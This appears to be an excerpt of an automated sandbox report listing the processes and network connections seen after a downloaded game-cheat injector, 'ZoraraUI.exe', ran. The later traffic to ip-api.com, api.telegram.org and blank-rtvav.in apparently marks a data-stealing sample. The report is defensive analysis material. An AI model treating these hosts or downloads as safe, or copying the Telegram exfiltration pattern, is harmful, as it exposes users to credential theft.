C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7816 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,5377675560713955564,7548726341831295102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3080 /prefetch:8
C:\Users\Admin\Downloads\ZoraraInjectINGAME\ZoraraUI.exe
"C:\Users\Admin\Downloads\ZoraraInjectINGAME\ZoraraUI.exe"
C:\Users\Admin\Downloads\ZoraraInjectINGAME\ZoraraUI.exe
"C:\Users\Admin\Downloads\ZoraraInjectINGAME\ZoraraUI.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ytzp7vuu92w1j.blob.core.windows.net | udp |
| GB | 20.60.164.1:443 | ytzp7vuu92w1j.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.164.60.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 88.221.135.32:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 32.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 88.221.135.0:443 | th.bing.com | tcp |
| GB | 88.221.135.40:443 | r.bing.com | tcp |
| GB | 88.221.135.40:443 | r.bing.com | tcp |
| GB | 88.221.135.0:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 0.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | private-user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aimbot.dev | udp |
| US | 172.67.146.163:443 | aimbot.dev | tcp |
| US | 172.67.146.163:443 | aimbot.dev | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | 163.146.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pumproll.online | udp |
| US | 104.21.27.217:443 | pumproll.online | tcp |
| US | 104.21.27.217:443 | pumproll.online | tcp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 104.18.11.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 8.8.8.8:53 | save.enabledstats.com | udp |
| IE | 63.32.42.62:443 | save.enabledstats.com | tcp |
| US | 8.8.8.8:53 | 217.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.42.32.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.11.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.201.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.187.238:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 142.250.200.49:443 | csp.withgoogle.com | tcp |
| US | 8.8.8.8:53 | 49.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | google.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | battlelog.co | udp |
| US | 104.22.31.188:443 | battlelog.co | tcp |
| US | 104.22.31.188:443 | battlelog.co | tcp |
| US | 8.8.8.8:53 | static.zdassets.com | udp |
| US | 216.198.54.3:443 | static.zdassets.com | tcp |
| US | 8.8.8.8:53 | 188.31.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ekr.zdassets.com | udp |
| US | 216.198.54.3:443 | ekr.zdassets.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.54.198.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | betteraimtechnologies.zendesk.com | udp |
| GB | 142.250.179.227:443 | www.google.co.uk | tcp |
| US | 216.198.54.1:443 | betteraimtechnologies.zendesk.com | tcp |
| US | 8.8.8.8:53 | widget-mediator.zopim.com | udp |
| US | 104.22.31.188:443 | battlelog.co | tcp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.54.198.216.in-addr.arpa | udp |
| IE | 79.125.110.213:443 | widget-mediator.zopim.com | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| FR | 3.164.163.87:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 213.110.125.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.163.164.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 88.221.135.57:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 57.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 216.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.cheating.gg | udp |
| DE | 57.129.16.247:443 | www.cheating.gg | tcp |
| DE | 57.129.16.247:443 | www.cheating.gg | tcp |
| DE | 57.129.16.247:443 | www.cheating.gg | tcp |
| DE | 57.129.16.247:443 | www.cheating.gg | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 95.101.143.35:443 | r.bing.com | tcp |
| GB | 95.101.143.35:443 | r.bing.com | tcp |
| GB | 95.101.143.34:443 | r.bing.com | tcp |
| GB | 95.101.143.34:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 35.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | support.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | support.content.office.net | udp |
| GB | 95.100.245.144:443 | www.microsoft.com | tcp |
| GB | 95.100.245.144:443 | www.microsoft.com | tcp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 8.8.8.8:53 | mem.gfx.ms | udp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| US | 152.199.21.175:443 | aadcdn.msftauth.net | tcp |
| AU | 40.79.167.8:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.250.103.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.138.73.23.in-addr.arpa | udp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| GB | 104.103.250.6:443 | support.content.office.net | tcp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.72:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 175.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.18.2.in-addr.arpa | udp |
| AU | 40.79.167.8:443 | browser.events.data.microsoft.com | tcp |
| AU | 40.79.167.8:443 | browser.events.data.microsoft.com | tcp |
| AU | 40.79.167.8:443 | browser.events.data.microsoft.com | tcp |
| AU | 40.79.167.8:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| GB | 95.101.143.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 185.143.101.95.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | identity.nel.measure.office.net | udp |
| GB | 88.221.134.219:443 | identity.nel.measure.office.net | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | blank-rtvav.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| GB | 95.101.143.210:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 95.101.143.211:443 | r.bing.com | tcp |
| GB | 95.101.143.211:443 | r.bing.com | tcp |
| GB | 95.101.143.212:443 | th.bing.com | tcp |
| GB | 95.101.143.212:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 212.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.101.95.in-addr.arpa | udp |
| GB | 95.101.143.210:443 | www.bing.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| GB | 95.101.143.211:443 | r.bing.com | tcp |
| GB | 95.101.143.211:443 | r.bing.com | tcp |
| GB | 95.101.143.212:443 | th.bing.com | tcp |
| GB | 95.101.143.212:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 95.101.143.212:443 | th.bing.com | udp |
| GB | 95.101.143.211:443 | r.bing.com | udp |
| US | 8.8.8.8:53 | fpt.microsoft.com | udp |
| US | 52.167.30.171:443 | fpt.microsoft.com | tcp |
| US | 8.8.8.8:53 | 171.30.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fpt6.microsoft.com | udp |
| US | 8.8.8.8:53 | fpt2.microsoft.com | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | private-user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 95.101.143.35:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | tse2.mm.bing.net | udp |
| US | 8.8.8.8:53 | sapphire-service.gitbook.io | udp |
| US | 104.18.40.47:443 | sapphire-service.gitbook.io | tcp |
| US | 104.18.40.47:443 | sapphire-service.gitbook.io | tcp |
| US | 104.18.40.47:443 | sapphire-service.gitbook.io | udp |
| US | 104.18.40.47:443 | sapphire-service.gitbook.io | udp |
| US | 8.8.8.8:53 | api.gitbook.com | udp |
| US | 104.18.41.89:443 | api.gitbook.com | tcp |
| US | 8.8.8.8:53 | 89.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.gitbook.com | udp |
| US | 104.18.41.89:443 | app.gitbook.com | tcp |
| US | 104.18.41.89:443 | app.gitbook.com | tcp |
| US | 104.18.41.89:443 | app.gitbook.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | web.vortex.data.microsoft.com | udp |
| US | 8.8.8.8:53 | cdn-dynmedia-1.microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | accdn.lpsnmedia.net | udp |
| US | 8.8.8.8:53 | analytics.tiktok.com | udp |
| GB | 184.28.198.218:443 | analytics.tiktok.com | tcp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| US | 8.8.8.8:53 | cdnssl.clicktale.net | udp |
| US | 8.8.8.8:53 | fpt.microsoft.com | udp |
| US | 8.8.8.8:53 | d.impactradius-event.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 8.8.8.8:53 | lptag.liveperson.net | udp |
| US | 8.8.8.8:53 | lpcdn.lpsnmedia.net | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| GB | 184.28.198.218:443 | analytics.tiktok.com | tcp |
| GB | 184.28.198.218:443 | analytics.tiktok.com | tcp |
| US | 8.8.8.8:53 | mem.gfx.ms | udp |
| US | 8.8.8.8:53 | publisher.liveperson.net | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| GB | 178.249.97.23:443 | lptag.liveperson.net | tcp |
| US | 34.120.154.120:443 | publisher.liveperson.net | tcp |
| GB | 178.249.97.99:443 | accdn.lpsnmedia.net | tcp |
